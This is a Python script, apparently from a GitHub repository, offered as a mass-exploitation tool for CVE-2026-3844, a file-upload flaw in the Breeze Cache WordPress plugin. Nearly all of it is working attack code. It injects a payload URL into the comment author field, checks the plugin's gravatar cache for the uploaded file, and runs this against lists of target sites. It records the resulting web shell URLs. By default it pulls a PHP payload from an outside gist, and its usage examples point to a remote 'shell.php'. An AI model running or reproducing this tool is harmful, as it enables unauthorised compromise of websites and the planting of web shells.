README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-3844 Mass Exploitation - Breeze Cache Arbitrary File Upload
By IM-Hanzou - Educational purposes only!
"""
import pycurl
import random
import string
import sys
import time
import os
from io import BytesIO
from urllib.parse import urlparse
from colorama import Fore, Style, init
from multiprocessing import Pool, Manager, Lock
import argparse
init(autoreset=True)
RESULTS_FILE = "successful_uploads.txt"
def generate_marker(length=12):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
def get_file_extension(url):
path = urlparse(url).path
ext = os.path.splitext(path)[1]
return ext if ext else '.php'
def save_result(target, shell_url, lock):
with lock:
with open(RESULTS_FILE, 'a') as f:
f.write(f"{target} | {shell_url}\n")
f.flush()
def curl_post(url, data, timeout=15):
buffer = BytesIO()
c = pycurl.Curl()
try:
c.setopt(c.URL, url)
c.setopt(c.POST, 1)
c.setopt(c.POSTFIELDS, data)
c.setopt(c.WRITEDATA, buffer)
c.setopt(c.FOLLOWLOCATION, True)
c.setopt(c.TIMEOUT, timeout)
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded'])
c.setopt(c.USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0')
c.perform()
status_code = c.getinfo(c.RESPONSE_CODE)
c.close()
return status_code, buffer.getvalue().decode('utf-8', errors='ignore')
except Exception as e:
c.close()
return 0, str(e)
def curl_get(url, timeout=15):
buffer = BytesIO()
c = pycurl.Curl()
try:
c.setopt(c.URL, url)
c.setopt(c.WRITEDATA, buffer)
c.setopt(c.FOLLOWLOCATION, False)
c.setopt(c.TIMEOUT, timeout)
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0')
c.perform()
status_code = c.getinfo(c.RESPONSE_CODE)
c.close()
return status_code, buffer.getvalue().decode('utf-8', errors='ignore')
except Exception as e:
c.close()
return 0, str(e)
def exploit(args):
target_url, payload_url, check_string, timeout, lock = args
marker = generate_marker()
file_ext = get_file_extension(payload_url)
parsed_target = urlparse(target_url)
if not parsed_target.scheme:
target_url = f"http://{target_url}"
parsed_target = urlparse(target_url)
base_url = f"{parsed_target.scheme}://{parsed_target.netloc}"
print(f"{Fore.CYAN}[>] {Fore.WHITE}{target_url} {Fore.YELLOW}| {marker}{file_ext}")
post_data = f"comment_post_ID=1&author=x+srcset={payload_url}&email=breeze{marker}@test.com&comment=test+{marker}&submit=Post+Comment"
status, response = curl_post(f"{base_url}/wp-comments-post.php", post_data, timeout)
if status in [200, 302, 303]:
print(f"{Fore.GREEN} [+] Comment posted")
elif status == 0:
print(f"{Fore.RED} [-] Connection error")
return {'status': 'error', 'target': target_url}
else:
print(f"{Fore.YELLOW} [!] Status: {status}")
time.sleep(10)
uploaded_file_url = f"{base_url}/wp-content/cache/breeze-extra/gravatars/{marker}{file_ext}"
status, response = curl_get(uploaded_file_url, timeout)
if status == 200:
if check_string:
if check_string in response:
print(f"{Fore.GREEN} [SUCCESS] {Fore.CYAN}{uploaded_file_url}")
save_result(target_url, uploaded_file_url, lock)
return {'status': 'success', 'url': uploaded_file_url, 'target': target_url}
else:
print(f"{Fore.YELLOW} [UPLOADED] String not found: {Fore.CYAN}{uploaded_file_url}")
return {'status': 'uploaded', 'url': uploaded_file_url, 'target': target_url}
else:
print(f"{Fore.GREEN} [SUCCESS] {Fore.CYAN}{uploaded_file_url}")
save_result(target_url, uploaded_file_url, lock)
return {'status': 'success', 'url': uploaded_file_url, 'target': target_url}
elif status == 404:
print(f"{Fore.RED} [-] Not found (404)")
return {'status': 'failed', 'target': target_url}
else:
print(f"{Fore.RED} [-] Status: {status}")
return {'status': 'failed', 'target': target_url}
def main():
DEFAULT_PAYLOAD = "https://gist.githubusercontent.com/im-hanzou/1768625b0492df34c32fc394835da595/raw/fbe555d4243f90cc0b01c5e2d676453823dfcf9c/CVE-2026-3844.php"
DEFAULT_SUCCESS_STRING = "4356452d323032362d33383434"
parser = argparse.ArgumentParser(
description=f"{Fore.CYAN}IM-Hanzou | CVE-2026-3844 - Breeze Cache Mass Exploit{Style.RESET_ALL}",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=f'''
Examples:
python3 {sys.argv[0]} -l targets.txt
python3 {sys.argv[0]} -l targets.txt -t 20
python3 {sys.argv[0]} -l targets.txt -p https://yourserver.com/shell.php -t 10
python3 {sys.argv[0]} -u http://target.com -p https://yourserver.com/shell.txt
'''
)
parser.add_argument('-l', '--list', help='File containing target URLs (one per line)')
parser.add_argument('-u', '--url', help='Single target URL')
parser.add_argument('-t', '--threads', type=int, default=10, help='Number of processes (default: 10)')
parser.add_argument('-p', '--payload', default=DEFAULT_PAYLOAD, help='Payload URL (default: GitHub Gist)')
parser.add_argument('--timeout', type=int, default=15, help='Request timeout in seconds (default: 15)')
args = parser.parse_args()
if not args.list and not args.url:
parser.print_help()
sys.exit(1)
targets = []
if args.url:
targets = [args.url]
elif args.list:
if not os.path.exists(args.list):
print(f"{Fore.RED}[-] File not found: {args.list}")
sys.exit(1)
with open(args.list, 'r') as f:
targets = [line.strip() for line in f if line.strip()]
if not targets:
print(f"{Fore.RED}[-] No targets found in {args.list}")
sys.exit(1)
is_default_payload = (args.payload == DEFAULT_PAYLOAD)
check_string = DEFAULT_SUCCESS_STRING if is_default_payload else None
print(f"{Fore.CYAN}{'='*70}")
print(f"{Fore.YELLOW}IM-Hanzou | CVE-2026-3844 - Breeze Cache Mass Exploit")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print(f"{Fore.WHITE}Targets: {Fore.GREEN}{len(targets)}")
print(f"{Fore.WHITE}Processes: {Fore.GREEN}{args.threads}")
print(f"{Fore.WHITE}Payload: {Fore.CYAN}{args.payload}")
print(f"{Fore.WHITE}Timeout: {Fore.YELLOW}{args.timeout}s")
print(f"{Fore.WHITE}String check: {Fore.YELLOW}{'Enabled' if check_string else 'Disabled (custom payload)'}")
print(f"{Fore.GREEN}Initializing...")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print()
if os.path.exists(RESULTS_FILE):
print(f"{Fore.YELLOW}[!] {RESULTS_FILE} exists, results will be appended{Style.RESET_ALL}")
print()
manager = Manager()
lock = manager.Lock()
task_args = [(target, args.payload, check_string, args.timeout, lock) for target in targets]
with Pool(processes=args.threads) as pool:
results_list = pool.map(exploit, task_args)
results = {
'success': [],
'uploaded': [],
'failed': [],
'error': []
}
for r in results_list:
results[r['status']].append(r)
print()
print(f"{Fore.CYAN}{'='*70}")
print(f"{Fore.YELLOW}EXPLOITATION SUMMARY")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print(f"{Fore.GREEN}Success: {len(results['success'])}")
print(f"{Fore.YELLOW}Uploaded (no string): {len(results['uploaded'])}")
print(f"{Fore.RED}Failed: {len(results['failed'])}")
print(f"{Fore.RED}Error: {len(results['error'])}")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print()
if results['success']:
print(f"{Fore.GREEN}SUCCESSFUL UPLOADS:")
print(f"{Fore.CYAN}{'-'*70}{Style.RESET_ALL}")
for r in results['success']:
print(f"{Fore.WHITE}Target: {Fore.CYAN}{r['target']}")
print(f"{Fore.WHITE}Shell: {Fore.GREEN}{r['url']}")
print()
if results['uploaded']:
print(f"{Fore.YELLOW}UPLOADED (String Not Found):")
print(f"{Fore.CYAN}{'-'*70}{Style.RESET_ALL}")
for r in results['uploaded']:
print(f"{Fore.WHITE}Target: {Fore.CYAN}{r['target']}")
print(f"{Fore.WHITE}File: {Fore.YELLOW}{r['url']}")
print()
if results['success']:
print(f"{Fore.GREEN}[+] Results saved to: {Fore.CYAN}{RESULTS_FILE}")
print()
if __name__ == "__main__":
main()